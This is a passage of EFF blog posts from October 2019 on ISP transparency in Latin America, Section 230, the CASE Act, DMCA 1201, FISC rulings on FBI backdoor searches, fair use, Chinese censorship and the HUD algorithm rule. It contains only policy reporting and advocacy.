Millicom’s Transparency Report stood out by clarifying the rules for government access to data in Colombia and Paraguay.  Both countries have adopted draconian laws that compel Internet Service Providers to grant direct access to their mobile network to authorities. In Colombia, the law establishes hefty fines if ISPs monitor interception taking place in their systems. This is why tech companies claim they do not possess information about how often and for what periods communications interception is carried out in their mobile networks. In this scenario, transparency reports become irrelevant. Conversely, in Paraguay, ISPs can view the judicial order requesting the interception, and the telecom company is aware when interception occurs in their system, and could potentially publish aggregate data about the number of data requests.

Brazil and Chile

InternetLab’s report shows progress in companies’ commitment to judicially challenge abusive law enforcement data requests or fight back against legislation that harms users’ privacy. In 2016, four of six companies took this kind of action. For example, the mobile companies featured in the research are part of an association that challenged before the Brazilian Supreme Court a law that allows law enforcement agents to access users' data without a warrant in case of human trafficking (Law 13.344/2016). The case is still open. Claro has also judicially challenged a direct request by the policy to access subscriber data. This number remained high in 2018 when five out of eight ISPs fought against unconstitutional laws, two of which also challenged disproportionate measures. 

In contrast, ISPs in Chile have been hesitant to challenge illegal and excessive requests. Derechos Digitales' 2019 report indicates that many ISPs are still failing to confront such requests in the courts on behalf of their users—except one. Entel got top marks because it was the only ISP to refuse the government requests for an individual’s data, out of the several ISPs contacted for the same information.

Chilean ISPs WOM!, VTR, Claro, and Entel also make clear in their law enforcement guidelines the need for a prior judicial order before handing content and metadata over to authorities. In Derechos Digitales' 2019 report, these companies published law enforcement guidelines out of the six featured in the research. None of these companies took these steps in 2017, the project's first year of operation in Chile. 

An even more significant achievement can be seen in user notification. ISPs in the region have always been reluctant to lay out a proper procedure for alerting users of government data requests, which was reflected in Chile's 2017 report. In the latest edition, however, WOM!, VTR, and Claro in Chile explicitly commit to user notification in their policies.


In Peru, three of five companies didn't publish privacy policies in 2015. By 2019 only one failed to provide details on the collection, use, and processing of their users’ personal data. Hiperderecho's 2019 report also shows progress in companies' commitment to demand judicial orders to hand over users' data. Bitel and Claro explicitly demand warrants when the request is for content. Telefónica (Movistar) stands out by requiring a warrant for both content and metadata. In 2015, only Movistar demanded a warrant for the content of the communication. 

Way Forward

Despite the progress seen in Brazil, Colombia, Chile, and Peru, there’s still a lot to be done in those countries. We also need to wait for upcoming evaluations for Argentina, Panama, Paraguay, and Spain, which were only recently included in the project.  But overall, too many telecom companies—whether large or small, global or local—still don't publish law enforcement guidelines or have not established proper procedures and legal obligations. Those guidelines should be based upon the national legal framework and the countries’ international human rights commitments for the government to obtain users' information.

Companies in the region equally fall short on committing to request a judicial order before handing over metadata to authorities. Finally, ISPs in the region are still wary of notifying users when governments make requests for user information. This is crucial for ensuring users’ ability to challenge the request and to seek remedies when it’s unlawful or disproportionate. The same fear keeps many ISPs from publicly defending their users in court and in Congress. 


For more information, see https://www.eff.org/qdtd and the relevant media coverage about our partners’ reports in Colombia, Paraguay, Brazil, Peru, Argentina, Spain, Chile, Mexico, and Panama.

EFF Defends Section 230 in Congress

EFF - Wed, 10/16/2019 - 9:55am
Watch EFF Legal Director Corynne McSherry Defend the Essential Law Protecting Internet Speech

All of us have benefited from Section 230, a federal law that has promoted the creation of virtually every open platform or communication tool on the Internet. The law’s premise is simple. If you are not the original creator of speech found on the Internet, you are not held liable if it does harm. But this simple premise is under attack in Congress. If some lawmakers get their way, the Internet could become a more restrictive space very soon.

EFF Legal Director Corynne McSherry will testify in support of Section 230 today in a House Energy and Commerce Committee hearing called “Fostering a Healthier Internet to Protect Consumers.” You can watch the hearing live on YouTube and follow along with our commentary @EFFLive.

%3Ciframe%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fembed%2FDaACbUEenZo%3Fautoplay%3D1%26mute%3D1%22%20allow%3D%22accelerometer%3B%20autoplay%3B%20encrypted-media%3B%20gyroscope%3B%20picture-in-picture%22%20allowfullscreen%3D%22%22%20width%3D%22560%22%20height%3D%22315%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from youtube.com

In McSherry’s written testimony, she lays out the case for why a strong Section 230 is essential to online community, innovation, and free expression.

Section 230 has ushered in a new era of community and connection on the Internet. People can find friends old and new over the Internet, learn, share ideas, organize, and speak out. Those connections can happen organically, often with no involvement on the part of the platforms where they take place. Consider that some of the most vital modern activist movements—#MeToo, #WomensMarch, #BlackLivesMatter—are universally identified by hashtags.

McSherry also cautions Congress to consider the unintended consequences of forcing online platforms to over-censor their users. When platforms take on overly restrictive and non-transparent moderation processes, marginalized people are often silenced disproportionately.

Without Section 230—or with a weakened Section 230—online platforms would have to exercise extreme caution in their moderation decisions in order to limit their own liability. A platform with a large number of users can’t remove all unlawful speech while keeping everything else intact. Therefore, undermining Section 230 effectively forces platforms to put their thumbs on the scale—that is, to remove far more speech than only what is actually unlawful, censoring innocent people and often important speech in the process.

Finally, Corynne urges Congress to consider the unintended consequences of last year’s Internet censorship bill FOSTA before it further undermines Section 230.

FOSTA teaches that Congress should carefully consider the unintended consequences of this type of legislation, recognizing that any law that puts the onus on online platforms to discern and remove illegal posts will result in over-censorship. Most importantly, it should listen to the voices most likely to be taken offline.

Read McSherry's full testimony.

Congressional Hearing Wednesday: EFF Will Urge Lawmakers to Protect Important Internet Free Speech Law

EFF - Tue, 10/15/2019 - 4:56pm
EFF Legal Director to Testify about How Consumers Benefit from CDA 230

Washington, D.C. – On Wednesday, Oct. 16, Electronic Frontier Foundation (EFF) Legal Director Corynne McSherry will testify at a congressional hearing in support of Section 230 of the Communications Decency Act (CDA)—one of the most important laws protecting Internet speech.

CDA 230 shields online platforms from liability for content posted by users, meaning websites and online services can’t be punished in court for things that their users say online. McSherry will tell lawmakers that the law protects a broad swath of online speech, from forums for neighborhood groups and local newspapers, to ordinary email practices like forwarding and websites where people discuss their views about politics, religion, and elections.

The law has played a vital role in providing a voice to those who previously lacked one, enabling marginalized groups to get their messages out to the whole world. At the same time, CDA 230 allows providers of all sizes to make choices about how to design and moderate their platforms. McSherry will tell lawmakers that weakening CDA 230 will encourage private censorship of valuable content and cement the dominance of those tech giants that can afford to shoulder new regulatory burdens.

McSherry is one of six witnesses who will testify at the House Committee on Energy and Commerce hearing on Wednesday, entitled “Fostering a Healthier Internet to Protect Consumers.”  Other witnesses include law professor Danielle Citron, and representatives from YouTube and reddit.

House Committee on Energy and Commerce
“Fostering a Healthier Internet to Protect Consumers”

EFF Legal Director Corynne McSherry

Wednesday, Oct 16
10 am

2123 Rayburn House Office Building
John D. Dingell Room
45 Independence Ave SW
Washington, DC  20515

For more on Section 230:

Contact:  CorynneMcSherryLegal Directorcorynne@eff.org IndiaMcKinneyDeputy Director of Federal Affairsindia@eff.org

Hearing Thursday: EFF’s Rainey Reitman Will Urge California Lawmakers to Balance Needs of Consumers In Developing Cryptocurrency Regulations

EFF - Tue, 10/15/2019 - 1:13pm
Consumer Protection and Choice Should be Paramount

Whittier, California—On Thursday, Oct. 17, at 10 am, EFF Chief Program Officer Rainey Reitman will urge California lawmakers to prioritize consumer choice and privacy in developing cryptocurrency regulations.

Reitman will testify at a hearing convened by the California Assembly Committee on Banking and Finance. The session, Virtual Currency Businesses: The Market and Regulatory Issues, will explore the business, consumer, and regulatory issues in the cryptocurrency market. EFF supports regulators stepping in to hold accountable those engaging in fraud, theft, and other misleading cryptocurrency business practices. But EFF has been skeptical of many regulatory proposals that are vague; designed for only one type of technology; could dissuade future privacy-enhancing innovation; or that might entrench existing players to the detriment of upstart innovators.

Reitman will tell lawmakers that cryptocurrency regulations should protect consumers but not chill future technological innovations that will benefit them.

WHAT: Informational Hearing of the California Assembly Committee on Banking  and Finance

WHO: EFF Chief Program Officer Rainey Reitman

WHEN: Thursday, October 17, 10 am

WHERE: Rio Hondo Community College
               Campus Inn
               600 Workman Mill Rd.
               Whittier, California 90601

For more about blockchain:

For more about EFF’s cryptocurrency activism:

Contact:  RaineyReitmanChief Program Officerrainey@eff.org

Today: Tell Congress Not to Pass Another Bad Copyright Law

EFF - Tue, 10/15/2019 - 8:36am

Today, Congress is back in session after a two-week break. Now that they’re back, we’re asking you to take a few minutes to call and tell them not to pass the Copyright Alternative in Small-Claims Enforcement (CASE) Act. The CASE Act would create an obscure board inside the U.S. Copyright Office which would be empowered to levy huge penalties against people accused of copyright infringement. It could have devastating effects on regular Internet users and little-to-no effect on true infringers. We know the CASE Act won’t work because we’ve seen similar “solutions” fail before.

Take Action

Tell Congress not to bankrupt users for regular Internet activity

The CASE Act is supposed to help artists by making it easy to make copyright infringement claims and collect “small” amounts of recompense. However, neither the problem of infringement nor this proposed solution is simple.

The CASE Act would allow copyright infringement claims to be made with a “Copyright Claims Board” staffed by “copyright claims officers,” who will then make decisions about the merits of the claim and how much is owed to the claimant. What the CASE Act doesn’t do is make sure those decisions meet the same requirements and standards that copyright claims have to follow in real courts. For example, filing a copyright infringement claim in a court requires a valid copyright registration so that there is a verifiable record about the owner and date of creation of the work at issue. The CASE Act has no such requirement for claims before the Copyright Claims Board, removing one of the important safeguards for making sure copyright claims are actually valid. The result of the CASE Act could be two different kinds of copyright law cases, with the one created by the Copyright Claims Board being almost impossible to appeal.

We already know how dangerous it can be to free expression when systems make copyright claims easy and counterclaims difficult and intimidating. The Digital Millennium Copyright Act’s (DMCA) takedown procedures have given us many, many examples. A critic used it to avoid criticism of his criticism. A group called “Straight Pride UK” used it when it looked bad in an interview it did. A Nazi romance movie did not like people making fun of how bad it was. The CASE Act does not adequately consider the free speech implications of making copyright claims easy to bring.

The CASE Act would also set a limit of $30,000 in penalties per proceeding. In a world where almost 40% of Americans would struggle to cover an emergency expense of $400, the Copyright Claims Board would have enormous power to ruin the lives of ordinary Americans.

This problem has been glossed over in a number of ways. One is emphasis on the supposedly “small claims” nature of the bill, made most clearly by Representative Doug Collins of Georgia, who laughed off the need to discuss this bill by saying the $30,000 limit amounted to “truly small claims.” Another is an emphasis on the “voluntary” nature of the CASE Act.

The CASE Act is described as voluntary not because everyone involved has agreed to be there, but because everyone involved has not not agreed. It’s as complicated as it sounds.

The CASE Act would allow people  who receive notice of a claim from this brand new Copyright Claims Board to get out of the proceedings by telling the Copyright Office they would like to opt out. However, the CASE Act doesn’t have any requirements about what “opting out” looks like other than that it has to be in accordance with regulations created by the Copyright Office itself.

That is no guarantee that opting out will be simple or easy. The Copyright Office’s regulations do not tend towards being easy reading for the average person. We see that every three years, when the Copyright Office issues its exemptions for Section 1201 of the DMCA.

Section 1201 bans circumventing of access controls on copyrighted works. It also empowers the Copyright Office to create exemptions to this prohibition. In certain circumstances—often ones rooted in free expression—you have the right to use copyrighted material without permission or paying the owner. And that “you” means everybody, not just people who make a living as documentary filmmakers, security researchers, and so on. However, the Copyright Office continues to make exemptions too complicated for regular people who don’t have lawyers to understand and use.

Given this history, it seems more likely than not that, if the CASE Act became law, the Copyright Office would continue in this vein. That is, its regulations would not be made easy to read and comply with. And the decisions of the claims board would focus less on issues of fair use and free expression, but more on technicalities and serving the desires of copyright holders.

In this environment, copyright trolls and worse would flourish. Copyright trolls make their money through copyright lawsuits, rather than through any legitimate creation. They are not fictional, nor are they a problem of the past. The CASE Act would make it easy for trolls to file a lot of claims. Not only could the trolls collect on those claims, but they could use the $30,000 limit to get their targets to agree to pay less, just to avoid the chance of a huge judgment being awarded by the board. And like in the case of the DMCA takedown system, most regular Internet users would find themselves in a scary, expensive situation if they tried to fight back.

DMCA takedown abuse has become a favorite tactic for scammers, and although the law makes it possible to go after fraudulent takedowns and counterclaims, it only happens in rare and extreme situations.

Because of how uneven the system the CASE Act would create is, and how complicated it stands to be, small copyright holders looking for a way to hold bad actors accountable are not going to find this system workable. Regular Internet users will be trapped, while those with money, and sophisticated infringers, will be able to navigate whatever opt-out system the Copyright Office creates.

So far this year, Congress has rushed the CASE Act through, without holding any hearings where its flaws could be publicly explained and debated. The CASE Act has passed out of committee in both the House and the Senate. Now that Congress is back in D.C., they need to hear from regular Internet users about how dangerous the CASE Act is for them. That’s why we’re asking you to call Congress today and tell your members of Congress to vote “no” on the CASE Act.

One Weird Law That Interferes With Security Research, Remix Culture, and Even Car Repair

EFF - Fri, 10/11/2019 - 7:37pm

How can a single, ill-conceived law wreak havoc in so many ways? It prevents you from making remix videos. It blocks computer security research. It keeps those with print disabilities from reading ebooks. It makes it illegal to repair people's cars. It makes it harder to compete with tech companies by designing interoperable products. It's even been used in an attempt to block third-party ink cartridges for printers.

It's hard to believe, but these are just some of the consequences of Section 1201 of the Digital Millennium Copyright Act, which gives legal teeth to "access controls" (like DRM). Courts have mostly interpreted the law as abandoning the traditional limitations on copyright's scope, such as fair use, in favor of a strict regime that penalizes any bypassing of access controls (such as DRM) on a copyrighted work regardless of your noninfringing purpose, regardless of the fact that you own that copy of the work.  

Since software can be copyrighted, companies have increasingly argued that you cannot even look at the code that controls a device you own, which would mean that you're not allowed to understand the technology on which you rely — let alone learn how to tinker with it or spot vulnerabilities or undisclosed features that violate your privacy, for instance.

Given how terrible Section 1201 is, we sued the government on behalf of security researcher Matt Green and innovator Andrew "bunnie" Huang — and his company, Alphamax. Our clients want to engage in important speech and they want to empower others to do the same — even when access controls get in the way.  

The case was dormant for over two years while we waited for a ruling from the judge on a preliminary matter, but it is finally moving once again, with several of our clients' First Amendment claims going forward. Last month, we asked the court to prohibit the unconstitutional enforcement of the law.

That has gotten the attention of the copyright cartels, who are likely to oppose our motion later this month. In their opinion, the already astronomical penalties for actual copyright infringement aren't enough to address the perceived problem, and the collateral damage to our freedom of speech and our understanding of the technology around us are all acceptable losses in their war to control the distribution of cultural works.  

EFF is proud to help our clients take on both the Department of Justice and one of the most powerful lobbying groups in the country—to fight for your freedoms and for a better world where we are free to understand the technology all around us and to participate in creating culture together.

Related Cases: Green v. U.S. Department of Justice

Secret Court Rules That the FBI’s “Backdoor Searches” of Americans Violated the Fourth Amendment

EFF - Fri, 10/11/2019 - 7:33pm
But the Court Misses the Larger Problem: Section 702’s Mass Surveillance is Inherently Unconstitutional

EFF has long maintained that it is impossible to conduct mass surveillance and still protect the privacy and constitutional rights of innocent Americans, much less the human rights of innocent people around the world.

This week, we were once again proven right. We learned new and disturbing information about the FBI’s repeated and unjustified searches of Americans’ information contained in massive databases of communications collected using the government’s Section 702 mass surveillance program.

A series of newly unsealed rulings from the federal district and appellate courts tasked with overseeing foreign surveillance show that the FBI has been unable to comply with even modest oversight rules Congress placed on “backdoor searches” of Americans by the FBI.  Instead, the Bureau routinely abuses its ability to search through this NSA-collected information for purposes unrelated to Section 702’s intended national security purposes.

The size of the problem is staggering. The Foreign Intelligence Surveillance Court (FISC) held that “the FBI has conducted tens of thousands of unjustified queries of Section 702 data.” The FISC found that the FBI created an “unduly lax” environment in which “maximal use” of these invasive searches was “a routine and encouraged practice.”

The court should have imposed a real constitutional solution: it should require the FBI to get a warrant before searching for people’s communications

But as is too often the case, the secret surveillance courts let the government off easy. Although the FISC initially ruled the FBI’s backdoor search procedures violated the Fourth Amendment in practice, the ultimate impact of the ruling was quite limited. After the government appealed, the FISC allowed the FBI to continue to use backdoor searches to invade people’s privacy—even in investigations that may have nothing to do with national security or foreign intelligence—so long as it follows what the appeals court called a “modest ministerial procedure.” Basically, this means requiring FBI agents to document more clearly why they were searching the giant 702 databases for information about Americans.

Rather than simply requiring a bit more documentation, we believe the court should have imposed a real constitutional solution: it should require the FBI to get a warrant before searching for people’s communications.

Ultimately, these orders follow a predictable path. First, they demonstrate horrific and systemic constitutional abuses. Then, they respond with small administrative adjustments.  They highlight how judges sitting on the secret surveillance courts seem to have forgotten their primary role of protecting innocent Americans from unconstitutional government actions. Instead, they become lost in a thicket of administrative procedures that are aimed at providing thin veil of privacy protection while allowing the real violations to continue.

Even when these judges are alerted to actual violations of the law, which have been occurring for more than a decade, they retreat from what should now be clear as day: Section 702 is itself unconstitutional. The law allows the government to sweep up people’s communications and records of communications and amass them in a database for later warrantless searching by the FBI. This can be done for reasons unrelated to national security, much less supported by probable cause.

No amount of “ministerial” adjustments can cure Section 702’s Fourth Amendment problems, which is why EFF has been fighting to halt this mass surveillance for more than a decade.

Opinion Shows FBI Engaged in Lawless, Unconstitutional Backdoor Searches of Americans

These rulings arose from a routine operation of Section 702—the FISC’s annual review of the government’s “certifications,” the high-level descriptions of its plans for conducting 702 surveillance. Unlike traditional FISA surveillance, the FISC does not review individualized, warrant-like applications under Section 702, and instead signs off on programmatic documents like “targeting” and “minimization” procedures. Unlike regular warrants, the individuals affected by the searches are never given notice, much less enabled to seek a remedy for misuse.  Yet, even under this limited (and we believe insufficient) judicial review, the FISC has repeatedly found deficiencies in the intelligence community’s procedures, and this most recent certification was no different.

Specifically, among the problems the FISC noticed were problems with the FBI’s backdoor search procedures. The court noted that in 2018, Congress directed the FBI to record every time it searched a database of communications collected under Section 702 for a term associated with a U.S. person, but that the Bureau was simply keeping a record of every time it ran such a search on all people. In addition, it was not making any record of why it was running these searches, meaning it could search for Americans’ communications without a lawful national security purpose. The court ordered the government to submit information, and also took the opportunity to appoint amici to counter the otherwise one-sided arguments by the government, a procedure given to the court as part of the 2015 USA Freedom Act (and which EFF had strongly advocated for).

As the FBI provided more information to the secret court, it became apparent just how flagrant the FBI’s disregard for the statute was. The court found no justification for FBI’s refusal to record queries of Americans’ identifiers, and that the agency was simply disobeying the will of Congress.

Even more disturbing was the FBI’s misuse of backdoor searches, which is when the FBI looks through people’s communications collected under Section 702 without a warrant and often for domestic law enforcement purposes. Since the beginning of Section 702, the FBI has avoided quantifying its use of backdoor searches, but we have known that its queries dwarfed other agencies. In the October 2018 FISC opinion, we get a window into just how disparate the number of FBI’s searches is. In 2017, the NSA, CIA and National Counterterrorism Center (NCTC) “collectively used approximately 7500 terms associated with U.S. persons to query content information acquired under Section 702.” Meanwhile, the FBI ran 3.1 million queries against a single database alone. Even the FISC itself did not get a full accounting of the FBI’s queries that year, or what percentage involved Americans’ identifiers, but the court noted that “given the FBI's domestic focus it seems likely that a significant percentage of its queries involve U.S.-person query terms.”

The court went on to explain that the lax—and sometimes nonexistent—oversight of these backdoor searches generated significant misuse. Examples reported by the government included tens of thousands of “batch queries” in which the FBI searched identifiers en masse on the basis that one of them would return foreign intelligence information. The court described a hypothetical involving suspicion that an employee of a government contractor was selling information about classified technology, in which the FBI would search identifiers belonging to all 100 of the contractor’s employees.

As the court observed, these “compliance” issues demonstrated “fundamental misunderstandings” about the statutory and administrative limits on use of Section 702 information, which is supposed to be “reasonably likely to return foreign intelligence information.” Worse, because the FBI did not document its agents’ justifications for running these queries, “it appears entirely possible that further querying violations involving large numbers of U S.-person query terms have escaped the attention of overseers and have not been reported to the Court.”

With the benefit of input from its appointed amici, the FISC initially saw these violations for what they were: a massive violation of Americans’ Fourth Amendment rights. Unfortunately, the court let the FBI off with a relatively minor modification of its backdoor search query procedures, and made no provision for those impacted by these violations to ever be formally notified, so that they could seek their own remedies. Instead, going forward, FBI personnel must document when they use U.S. person identifiers to run backdoor searches—as required by Congress—and they must describe why these queries are likely to return foreign intelligence.  That’s it.

Even as to this requirement – which was already what the law required -- there are several exceptions and loopholes.  This means that at least in some cases, the FBI can still trawl through massive databases of warrantlessly collected communications using Americans’ names, phone numbers, social security numbers and other information and then use the contents of the communications for investigations that have nothing to do with national security.

Secret Court Rulings Are Important, But Miss the Larger Problems With Section 702 Mass Surveillance

It is disturbing that in response to widespread unconstitutional abuses by the FBI, the courts charged with protecting people’s privacy and overseeing the government’s surveillance programs required FBI officials to just do more paperwork. The fact that such a remedy was seen as appropriate underscores how abstract ordinary people’s privacy—and the Fourth Amendment’s protections—have become for both FISC judges and the appeals judges above them on the Foreign Intelligence Court of Review (FISCR).

But the fact that judges view protecting people’s privacy rights through the abstract lens of procedures is also the fault of Congress and the executive branch, who continue to push the fiction that mass surveillance programs operating Section 702 can be squared with the Fourth Amendment. They cannot be.

First, Section 702 allows widespread collection (seizure) of people’s Internet activities and communications without a warrant, and the subsequent use of that information (search) for general criminal purposes as well as national security purposes. Such untargeted surveillance and accompanying privacy invasions are anathema to our constitutional right to privacy and resembles a secret general warrant to search anyone, at any time.

The Founders did not fight a revolution to gain the right to government agency protocols

Second, rather than judges deciding in specific cases whether the government has probable cause to justify its surveillance of particular people or groups, the FISC’s role under Section 702 is relegated to approving general procedures that the government says are designed to protect people’s privacy overall. Instead of serving as a neutral magistrate that protects individual privacy, the court is several steps removed from the actual people caught up in the government’s mass surveillance. This allows judges to then decide people’s rights in the abstract and without ever having to notify the people involved, much less provide them with a remedy for violations. This likely leads the FISC to be more likely to view procedures and paperwork as sufficient to safeguard people’s Fourth Amendment rights. It’s also why individual civil cases like our Jewel v. NSA case are so necessary.

As the Supreme Court stated in Riley v. California, “the Founders did not fight a revolution to gain the right to government agency protocols.” Yet such abstract agency protocols are precisely what the FISC endorses and applies here with regard to your constitutionally protected communications.

Third, because Section 702 allows the government to amass vast stores of people’s communications and explicitly authorizes the FBI to search it, it encourages the very privacy abuses the FISC’s 2018 opinion details. These Fourth Amendment violations are significant and problematic. But because the FISC is so far removed from overseeing the FBI’s access to the data, it does not consider the most basic protections required by the Constitution: requiring agents to get a warrant.

We hope that these latest revelations are a wake-up call for Congress to act and repeal Section 702 or, at minimum, to require the FBI to get individual warrants, approved by a court, before beginning their backdoor searches.  And while we believe current law allows our civil litigation, Congress can also remove government roadblocks by providing clear, unequivocal notice, as well as an individual remedy for those injured by any FBI or NSA or CIA violations of this right. We also hope that the FISC itself will object to merely being an administrative oversight body, and instead push for more stringent protections for people’s privacy, and pay more attention to the inherent constitutional problems of Section 702.

But no matter what, EFF will continue to push its legal challenges to the government’s mass surveillance program and will work to bring an end to unconstitutional mass surveillance.

Related Cases: Jewel v. NSA

EFF to Court: Parody Book Combining Dr. Seuss and Star Trek Themes Is Fair Use

EFF - Fri, 10/11/2019 - 3:40pm
Mash-up is Transformative Work Protected by Copyright Law

San Francisco—The Electronic Frontier Foundation (EFF) urged a federal appeals court today to rule that the creators of a parody book called “Oh The Places You’ll Boldly Go!”—a mash-up of Dr. Seuss and Star Trek themes—didn’t infringe copyrights in the Dr. Seuss classic “Oh The Places You’ll Go!”

The illustrated, crowdsourced book combines elements found in Dr. Seuss children’s books, like the look of certain characters and landscapes, with themes and characters from the sci-fi television series Star Trek, to create a new, transformative work of creative expression, EFF said in a brief filed today.

Dr. Seuss Enterprises, which licenses Seuss material, sued the book’s creators for copyright infringement. A lower court correctly concluded that the way in which the “Boldly” book borrows and builds upon copyrighted material in the Dr. Seuss book constitutes fair use under U.S. copyright law. EFF, represented by Harvard Law School’s Cyberlaw Clinic and joined by Public Knowledge, the Organization for Transformative Works, Professor Francesca Coppa, comic book writer Magdalene Visaggio, and author David Mack, asked the U.S. Court of Appeals for the Ninth Circuit to uphold the decision.

“The fair use doctrine recognizes that artists and creators must have the freedom to build upon existing culture to create new works that enrich, entertain, and amuse the public,” said EFF Legal Director Corynne McSherry. “Fair use is the safety valve that ensures creators like the authors of ‘Oh The Places You’ll Boldly Go!’ don’t have to beg permission from a copyright holder in order to make works that express new and unique ideas.”

“Oh The Places You’ll Boldly Go!” takes characters and images from five Dr. Seuss books and remakes them into comedic depictions of Captain Kirk, Dr. Spock, and various Star Trek creatures. The book’s visual puns—the multi-color saucer from the cover of “Oh The Places You’ll Go!” is used to create a new kind of starship Enterprise, while a Dr. Seuss character referred to as a “fix-it-up-chappie” is reimagined as Scottie, the ship’s chief engineer—are a form of commentary on the Seuss and Star Trek worlds.

“‘Boldly’s’ creative adaptation of Dr. Seuss works is an example of artistic expression that would be stifled by overly restrictive application of copyright law,” said McSherry.

For the brief:

For more on intellectual property and innovation:

Contact:  CorynneMcSherryLegal Directorcorynne@eff.org

China’s Global Reach: Surveillance and Censorship Beyond the Great Firewall

EFF - Thu, 10/10/2019 - 5:46pm

Those outside the People’s Republic of China (PRC) are accustomed to thinking of the Internet censorship practices of the Chinese state as primarily domestic, enacted through the so-called "Great Firewall"—a system of surveillance and blocking technology that prevents Chinese citizens from viewing websites outside the country. The Chinese government’s justification for that firewall is based on the concept of “Internet sovereignty.” The PRC has long declared that “within Chinese territory, the internet is under the jurisdiction of Chinese sovereignty.''

Hong Kong, as part of the "one country, two systems" agreement, has largely lived outside that firewall: foreign services like Twitter, Google, and Facebook are available there, and local ISPs have made clear that they will oppose direct state censorship of its open Internet.

But the ongoing Hong Kong protests, and mainland China's pervasive attempts to disrupt and discredit the movement globally, have highlighted that China is not above trying to extend its reach beyond the Great Firewall, and beyond its own borders. In attempting to silence protests that lie outside the Firewall, in full view of the rest of the world, China is showing its hand, and revealing the tools it can use to silence dissent or criticism worldwide.

In attempting to silence protests that lie outside the Firewall, in full view of the rest of the world, China is showing its hand, and revealing the tools it can use to silence dissent or criticism worldwide.

Some of those tools—such as pressure on private entities, including American corporations NBA and Blizzard—have caught U.S. headlines and outraged customers and employees of those companies. Others have been more technical, and less obvious to the Western observers.

The “Great Cannon” takes aim at sites outside the Firewall

The Great Cannon is a large-scale technology deployed by ISPs based in China to inject javascript code into customers’ insecure (HTTP) requests. This code weaponizes the millions of mainland Chinese Internet connections that pass through these ISPs. When users visit insecure websites, their browsers will also download and run the government’s malicious javascript—which will cause them to send additional traffic to sites outside the Great Firewall, potentially slowing these websites down for other users, or overloading them entirely.

The Great Cannon’s debut in 2015 took down Github, where Chinese users were hosting anti-censorship software and mirrors of otherwise-banned news outlets like the New York Times. Following widespread international backlash, this attack was halted.

Last month, the Great Cannon was activated once again, aiming this time at Hong Kong protestors. It briefly took down LIHKG, a Hong Kong social media platform central to organizing this summer’s protests.

Targeting the global Chinese community through malware

Pervasive online surveillance is a fact of life within the Chinese mainland. But if the communities the Chinese government wants to surveill aren’t at home, it is increasingly willing to invest in expensive zero-days to watch them abroad, or otherwise hold their families at home hostage.

Last month, security researchers uncovered several expensive and involved mobile malware campaigns targeting the Uyghur and Tibetan diasporas. One constituted a broad “watering hole” attack using several zero-days to target visitors of Uyghur-language websites.

As we’ve noted previously, this represents a sea-change in how zero-days are being used; while China continues to target specific high-profile individuals in spear-phishing campaigns, they are now unafraid to cast a much wider net, in order to place their surveillance software on entire ethnic and political groups outside China’s border.

Censoring Chinese Apps Abroad

At home, China doesn’t need to use zero-days to install its own code on individuals’ personal devices. Chinese messaging and browser app makers are required to include government filtering on their client, too. That means that when you use an app created by a mainland Chinese company, it likely contains code intended to scan and block prohibited websites or language.

Until now, China has been largely content to keep the activation of this device-side censorship concentrated within its borders. The keyword filtering embedded in WeChat only occurs for users with a mainland Chinese phone number. Chinese-language versions of domestic browsers censor and surveill significantly more than the English-language versions. But as Hong Kong and domestic human rights abuses draw international interest, the temptation to enforce Chinese policy abroad has grown.

TikTok is one of the largest and fastest-growing global social media platforms spun out of Beijing. It heavily moderates its content, and supposedly has localized censors for different jurisdictions. But following a government crackdown on “short video” platforms at the beginning of this year, news outlets began reporting on the lack of Hong Kong-related content on the platform. TikTok’s leaked general moderation guidelines expressly forbid any content criticizing the Chinese government, like content related to the Chinese persecution of ethnic minorities, or about Tiananmen Square.

Internet users outside the United States may recognise the dynamic of a foreign service exporting its domestic decision-making abroad. For many years, America’s social media companies have been accused of exporting U.S. culture and policy to the rest of the world: Facebook imposes worldwide censorship of nudity and sexual language, even in countries that are more culturally permissive on these topics than the U.S. Most services obey DMCA takedown procedures of allegedly copyright-infringing content, even in countries that have had alternative resolution laws. The influence that the United States has on its domestic tech industries has led to an outsized influence on those companies’ international user base.

That said, U.S. companies have, as with developers in most countries, resisted the inclusion of state-mandated filters or government-imposed code within their own applications. In China, domestic and foreign companies have been explicitly mandated to comply with Chinese censorship under the national Cybersecurity Law passed in 2017, which provides aggressive yet vague guidelines for content moderation. China imposing its rules on global Chinese tech companies differs from the United States’ influence on the global Internet in more than just degree.

Money Talks: But Critics Can’t

This brings us to the most visible arm of the China’s new worldwide censorship toolkit: economic pressure on global companies. The Chinese domestic market is increasingly important to companies like Blizzard and the National Basketball Association (NBA). This means that China can use threats of boycotts or the denial of access to Chinese markets to silence these companies when they, or people affiliated with them, express support for the Hong Kong protestors.

Already, people are fighting back against the imposition of Chinese censorship on global companies. Blizzard employees staged a walk-out in protest, NBA fans continue to voice their support for the demonstrations in Hong Kong, and fans are rallying to boycott the two companies. But multi-national companies who can control their users’ speech can expect to see more pressure from China as its economic clout grows.

Is China setting the Standard for Global Enforcement of Local Law?

Parochial “Internet sovereignty’ has proven insufficient to China’s needs: Domestic policy objectives now require it to control the Internet outside and inside its borders.

To be clear, China’s government is not alone in this: rather than forcefully opposing and protesting their actions, other states—including the United States and the European Union— have been too busy making their own justifications for the extra-territorial exercise of their own surveillance and censorship capabilities.

China now projects its Internet power abroad through the pervasive and unabashed use of malware and state-supported DDoS attacks; mandated client-side filtering and surveillance; economic sanctions to limit cross-border free speech; and pressure on private entities to act as a global cultural police.

Unless lawmakers, corporations, and individual users are as brave in standing up to authoritarian acts as the people of Hong Kong, we can expect to see these tactics adopted by every state, against every user of the Internet.

Tell HUD: Algorithms Shouldn't Be an Excuse to Discriminate

EFF - Thu, 10/10/2019 - 1:29pm

The U.S. Department of Housing and Urban Development (HUD) recently released a proposed rule that will have grave consequences for the enforcement of fair housing laws. Under the Fair Housing Act, individuals can bring claims on the basis of a protected characteristic (like race, sex, or disability status) when there is a facially-neutral policy or practice that results in unjustified discriminatory effect, or disparate impact. The proposed rule makes it much harder to bring a disparate impact claim under the Fair Housing Act. Moreover, HUD’s rule creates three affirmative defenses for housing providers, banks, and insurance companies that use algorithmic models to make housing decisions. As we’ve previously explained, these algorithmic defenses demonstrate that HUD doesn’t understand how machine learning actually works.

This proposed rule could significantly impact housing decisions and make discrimination more prevalent. We encourage you to submit comments to speak out against HUD's proposed rule. Here's how to do it in three easy steps:

  1. Go to the government’s comments site and click on “Comment Now.”
